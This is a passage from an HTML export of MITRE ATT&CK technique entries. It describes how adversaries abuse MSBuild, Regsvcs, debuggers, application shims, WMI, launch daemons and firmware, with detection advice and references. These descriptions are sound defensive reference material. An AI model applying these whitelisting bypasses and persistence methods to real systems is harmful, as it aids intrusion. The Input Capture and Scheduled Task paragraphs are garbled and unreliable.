<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 570. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1142">https://attack.mitre.org/wiki/Technique/T1142</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Keychain%20(software)">https://en.wikipedia.org/wiki/Keychain%20(software)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_input_capture"><a class="anchor" href="#_input_capture"></a><a class="link" href="#_input_capture">Input Capture</a></h3>
<div class="paragraph">
<p>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.</p>
</div>
<div class="paragraph">
<p>Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.Valid Accounts in use by adversaries may help to catch the result of user input interception if new techniques are used.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Kernel drivers, Process monitoring, API monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 571. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1056">https://attack.mitre.org/wiki/Technique/T1056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/">http://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/">https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regsvcs_regasm"><a class="anchor" href="#_regsvcs_regasm"></a><a class="link" href="#_regsvcs_regasm">Regsvcs/Regasm</a></h3>
<div class="paragraph">
<p>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.[[Citation: MSDN Regsvcs]][[Citation: MSDN Regasm]]</p>
</div>
<div class="paragraph">
<p>Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.[[Citation: SubTee GitHub All The Things Application Whitelisting Bypass]]</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 572. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1121">https://attack.mitre.org/wiki/Technique/T1121</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/04za0hca.aspx">https://msdn.microsoft.com/en-us/library/04za0hca.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx">https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/subTee/AllTheThings">https://github.com/subTee/AllTheThings</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trusted_developer_utilities"><a class="anchor" href="#_trusted_developer_utilities"></a><a class="link" href="#_trusted_developer_utilities">Trusted Developer Utilities</a></h3>
<div class="paragraph">
<p>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.</p>
</div>
<div class="paragraph">
<p>===MSBuild===</p>
</div>
<div class="paragraph">
<p>MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.[[Citation: MSDN MSBuild]]</p>
</div>
<div class="paragraph">
<p>Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.[[Citation: MSDN MSBuild Inline Tasks]] MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.[[Citation: SubTee GitHub All The Things Application Whitelisting Bypass]]</p>
</div>
<div class="paragraph">
<p>===DNX===</p>
</div>
<div class="paragraph">
<p>The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.[[Citation: Microsoft Migrating from DNX]] DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.[[Citation: engima0x3 DNX Bypass]]</p>
</div>
<div class="paragraph">
<p>===RCSI===</p>
</div>
<div class="paragraph">
<p>The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.[[Citation: Microsoft Roslyn CPT RCSI]] The rcsi.exe binary is signed by Microsoft.[[Citation: engima0x3 RCSI Bypass]]</p>
</div>
<div class="paragraph">
<p>C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.[[Citation: engima0x3 RCSI Bypass]]</p>
</div>
<div class="paragraph">
<p>===WinDbg/CDB===</p>
</div>
<div class="paragraph">
<p>WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.[[Citation: Microsoft Debugging Tools for Windows]] They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.[[Citation: Exploit Monday WinDbg]]</p>
</div>
<div class="paragraph">
<p>It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>Detection: The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</p>
</div>
<div class="paragraph">
<p>Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 573. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1127">https://attack.mitre.org/wiki/Technique/T1127</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/">https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/dd722601.aspx">https://msdn.microsoft.com/library/dd722601.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.msdn.microsoft.com/visualstudio/2011/10/19/introducing-the-microsoft-roslyn-ctp/">https://blogs.msdn.microsoft.com/visualstudio/2011/10/19/introducing-the-microsoft-roslyn-ctp/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index">https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/subTee/AllTheThings">https://github.com/subTee/AllTheThings</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/dd393574.aspx">https://msdn.microsoft.com/library/dd393574.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html">http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/">https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/en-us/dotnet/core/migration/from-dnx">https://docs.microsoft.com/en-us/dotnet/core/migration/from-dnx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_network_configuration_discovery"><a class="anchor" href="#_system_network_configuration_discovery"></a><a class="link" href="#_system_network_configuration_discovery">System Network Configuration Discovery</a></h3>
<div class="paragraph">
<p>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 574. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1016">https://attack.mitre.org/wiki/Technique/T1016</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scheduled_task"><a class="anchor" href="#_scheduled_task"></a><a class="link" href="#_scheduled_task">Scheduled Task</a></h3>
<div class="paragraph">
<p>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 575. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1053">https://attack.mitre.org/wiki/Technique/T1053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc785125.aspx">https://technet.microsoft.com/en-us/library/cc785125.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_shimming"><a class="anchor" href="#_application_shimming"></a><a class="link" href="#_application_shimming">Application Shimming</a></h3>
<div class="paragraph">
<p>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow compatibility of programs as Windows updates and changes its code. For example, application shimming feature that allows programs that were created for Windows XP to work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>&lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt;</p>
</li>
<li>
<p>&lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Custom databases are stored in:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>&lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt;</p>
</li>
<li>
<p>&lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Utilizing these shims, an adversary can perform several malicious acts, such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</p>
</div>
<div class="paragraph">
<p>Detection: There are several public tools available that will detect shims that are currently available[[Citation: Black Hat 2015 App Shim]]:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shim-Process-Scanner - checks memory of every running process for any Shim flags</p>
</li>
<li>
<p>Shim-Detector-Lite - detects installation of custom shim databases</p>
</li>
<li>
<p>Shim-Guard - monitors registry for any shim installations</p>
</li>
<li>
<p>ShimScanner - forensic tool to find active shims in memory</p>
</li>
<li>
<p>ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, System calls, Windows Registry, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 576. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1138">https://attack.mitre.org/wiki/Technique/T1138</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf">https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation"><a class="anchor" href="#_windows_management_instrumentation"></a><a class="link" href="#_windows_management_instrumentation">Windows Management Instrumentation</a></h3>
<div class="paragraph">
<p>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)[[Citation: Wikipedia SMB]] and Remote Procedure Call Service (RPCS)[[Citation: TechNet RPC]] for remote access. RPCS operates over port 135.[[Citation: MSDN WMI]]</p>
</div>
<div class="paragraph">
<p>An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for <a id="Discovery"></a> and remote <a id="Execution"></a> of files as part of [[Lateral Movement]].[[Citation: FireEye WMI 2015]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior.[[Citation: FireEye WMI 2015]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Netflow/Enclave netflow, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 577. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1047">https://attack.mitre.org/wiki/Technique/T1047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa394582.aspx">https://msdn.microsoft.com/en-us/library/aa394582.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Server%20Message%20Block">https://en.wikipedia.org/wiki/Server%20Message%20Block</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc787851.aspx">https://technet.microsoft.com/en-us/library/cc787851.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ntfs_extended_attributes"><a class="anchor" href="#_ntfs_extended_attributes"></a><a class="link" href="#_ntfs_extended_attributes">NTFS Extended Attributes</a></h3>
<div class="paragraph">
<p>Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.[[Citation: Journey into IR ZeroAccess NTFS EA]]</p>
</div>
<div class="paragraph">
<p>The NTFS format has a feature called Extended Attributes (EA), which allows data to be stored as an attribute of a file or folder.[[Citation: Microsoft File Streams]]</p>
</div>
<div class="paragraph">
<p>Detection: Forensic techniques exist to identify information stored in EA.[[Citation: Journey into IR ZeroAccess NTFS EA]] It may be possible to monitor NTFS for writes or reads to NTFS EA or to regularly scan for the presence of modified information.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Kernel drivers</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 578. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1096">https://attack.mitre.org/wiki/Technique/T1096</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html">http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa364404">http://msdn.microsoft.com/en-us/library/aa364404</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launch_daemon"><a class="anchor" href="#_launch_daemon"></a><a class="link" href="#_launch_daemon">Launch Daemon</a></h3>
<div class="paragraph">
<p>Per Apples developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;[[Citation: AppleDocs Launch Agent Daemons]]. These LaunchDaemons have property list files which point to the executables that will be launched[[Citation: Methods of Mac Malware Persistence]].</p>
</div>
<div class="paragraph">
<p>Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories[[Citation: OSX Malware Detection]]. The daemon name may be disguised by using a name from a related operating system or benign software [[Citation: WireLurker]]. Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.</p>
</div>
<div class="paragraph">
<p>The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemons executable and gain persistence or Privilege Escalation.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See&#8217;s Knock Knock application.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 579. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1160">https://attack.mitre.org/wiki/Technique/T1160</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf">https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf">https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_discovery"><a class="anchor" href="#_process_discovery"></a><a class="link" href="#_process_discovery">Process Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>An example command that would obtain details on processes is "tasklist" using the Tasklist utility.</p>
</div>
<div class="paragraph">
<p>===Mac and Linux===</p>
</div>
<div class="paragraph">
<p>In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 580. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1057">https://attack.mitre.org/wiki/Technique/T1057</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_firmware"><a class="anchor" href="#_system_firmware"></a><a class="link" href="#_system_firmware">System Firmware</a></h3>
<div class="paragraph">
<p>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.[[Citation: Wikipedia BIOS]][[Citation: Wikipedia UEFI]][[Citation: About UEFI]]</p>
</div>
<div class="paragraph">
<p>System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</p>
</div>
<div class="paragraph">
<p>Detection: System firmware manipulation may be detected.[[Citation: MITRE Trustworthy Firmware Measurement]] Dump and inspect BIOS images on vulnerable systems and compare against known good images.[[Citation: MITRE Copernicus]] Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.</p>
</div>
<div class="paragraph">
